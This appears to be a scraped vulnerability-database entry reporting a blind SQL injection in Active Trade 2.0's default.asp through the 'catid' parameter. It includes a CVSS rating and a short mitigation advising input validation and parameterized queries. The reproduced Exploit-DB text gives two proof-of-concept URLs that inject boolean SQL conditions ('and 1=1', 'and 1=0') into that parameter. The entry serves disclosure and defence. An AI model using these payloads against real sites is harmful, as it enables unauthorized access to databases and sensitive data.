header-logo
Suggest Exploit
vendor:
Active Trade 2.0
by:
Hussin X
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Active Trade 2.0
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

Active Trade 2.0(default.asp) Blind SQL Injection Vulnerability

Active Trade 2.0 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'catid' in the default.asp page. This can be exploited to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Active Trade 2.0(default.asp) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : hussin.x@gmail.com

____________________________________

Vendor : http://www.activewebsoftwares.com

Demo :
_______

http://server/default.asp?catid=39+and+1=1 ( true )

http://server/default.asp?catid=39+and+1=0 ( false )


Greetz :
WwW.IQ-ty.CoM

| CraCkEr | Cyber-Zone | str0ke | kadmiwe | jiko